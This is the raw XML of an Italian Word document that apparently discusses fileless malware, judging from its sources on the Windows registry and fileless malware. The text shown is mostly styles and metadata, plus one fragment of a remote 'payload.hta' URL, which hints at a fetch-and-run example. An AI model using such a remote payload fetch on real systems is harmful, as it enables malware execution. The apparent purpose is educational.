  <w:num w:numId="12" w16cid:durableId="1981299414">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1699313517">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="998113943">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="2034728165">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1215310160">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="480774904">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1595555786">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1238134191">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1038969861">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="141088081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D58"/>
    <w:rsid w:val="00065CDF"/>
    <w:rsid w:val="00071949"/>
    <w:rsid w:val="000D7F53"/>
    <w:rsid w:val="00105827"/>
    <w:rsid w:val="0011290F"/>
    <w:rsid w:val="00125DF2"/>
    <w:rsid w:val="00145803"/>
    <w:rsid w:val="00180850"/>
    <w:rsid w:val="00185E2B"/>
    <w:rsid w:val="001A1FCA"/>
    <w:rsid w:val="001C73F0"/>
    <w:rsid w:val="00297E03"/>
    <w:rsid w:val="002E7108"/>
    <w:rsid w:val="003861B7"/>
    <w:rsid w:val="00402416"/>
    <w:rsid w:val="00404CE1"/>
    <w:rsid w:val="0041086B"/>
    <w:rsid w:val="004410EE"/>
    <w:rsid w:val="004437DD"/>
    <w:rsid w:val="00481516"/>
    <w:rsid w:val="004A60F7"/>
    <w:rsid w:val="004C1A8D"/>
    <w:rsid w:val="004C1E3B"/>
    <w:rsid w:val="004C295E"/>
    <w:rsid w:val="004C6185"/>
    <w:rsid w:val="00523F8E"/>
    <w:rsid w:val="005E2E89"/>
    <w:rsid w:val="00630F76"/>
    <w:rsid w:val="00676D58"/>
    <w:rsid w:val="006900E6"/>
    <w:rsid w:val="00700FBC"/>
    <w:rsid w:val="00756929"/>
    <w:rsid w:val="00766A68"/>
    <w:rsid w:val="0079576D"/>
    <w:rsid w:val="007B69A1"/>
    <w:rsid w:val="007C4354"/>
    <w:rsid w:val="00805222"/>
    <w:rsid w:val="008A58C2"/>
    <w:rsid w:val="008C1163"/>
    <w:rsid w:val="00964EE8"/>
    <w:rsid w:val="009819F2"/>
    <w:rsid w:val="00A351D4"/>
    <w:rsid w:val="00A450D8"/>
    <w:rsid w:val="00A50725"/>
    <w:rsid w:val="00A75C3D"/>
    <w:rsid w:val="00A82548"/>
    <w:rsid w:val="00AC6EDB"/>
    <w:rsid w:val="00B3023D"/>
    <w:rsid w:val="00B951B4"/>
    <w:rsid w:val="00BA07F1"/>
    <w:rsid w:val="00C94CC0"/>
    <w:rsid w:val="00D81211"/>
    <w:rsid w:val="00E120F6"/>
    <w:rsid w:val="00E70CA9"/>
    <w:rsid w:val="00E80709"/>
    <w:rsid w:val="00E97BB0"/>
    <w:rsid w:val="00EE72F4"/>
    <w:rsid w:val="00F7268D"/>
    <w:rsid w:val="00F85F18"/>
    <w:rsid w:val="00FA2A3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6ECEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{85F416BB-EAE7-4711-AC09-5A9C466E2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7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76D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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D5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76D58"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titolo">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="TitoloCarattere"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00676D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76D5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76D5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76D5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76D5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76D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Enfasiintensa">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Citazioneintensa">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:link w:val="CitazioneintensaCarattere"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="0067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76D58"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Riferimentointenso">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00676D58"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliografia">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normale"/>
    <w:next w:val="Normale"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C1E3B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormaleWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00523F8E"/>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character" w:styleId="CodiceHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00523F8E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Collegamentoipertestuale">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B951B4"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Menzionenonrisolta">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B951B4"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grigliatabellachiara">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="Tabellanormale"/>
    <w:uiPriority w:val="40"/>
    <w:rsid w:val="00FA2A3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0915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="117339079">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="202519508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="218516755">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="609431508">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="761530889">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1529105488">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702779942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1802452200">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1818498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rver-remoto/payload.hta"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Mic25</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6E257BE5-484A-4FD3-BA7D-6789BE9B90F6}</b:Guid>
    <b:Year>2025</b:Year>
    <b:LCID>it-IT</b:LCID>
    <b:Author>
      <b:Author>
        <b:Corporate>Microsoft</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Month>Gennaio</b:Month>
    <b:Day>15</b:Day>
    <b:URL>https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</b:URL>
    <b:Title>Informazioni sul Registro di sistema di Windows per gli utenti esperti</b:Title>
    <b:InternetSiteTitle>Microsoft Learn</b:InternetSiteTitle>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Spr20</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{D47B82CA-CEB4-4781-9656-A79BD11CA790}</b:Guid>
    <b:Title>An emerging threat Fileless malware: a survey and research challenges</b:Title>
    <b:Year>2020</b:Year>
    <b:URL>https://link.springer.com/article/10.1186/s42400-019-0043-x</b:URL>
    <b:Author>
      <b:Author>
        <b:Corporate>Springer Nature</b:Corporate>
      </b:Author>
    </b:Author>
    <b:JournalName>Springer Nature Link</b:JournalName>
    <b:LCID>en-US</b:LCID>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{FECABDFA-65E1-452A-9301-4120BD5EB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5651</TotalTime>
  <Pages>4</Pages>
  <Words>661</Words>
  <Characters>3771</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>31</Lines>
  <Paragraphs>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Bellomo</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>BELLOMO NICOLAS</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-02-11T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-17T12:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>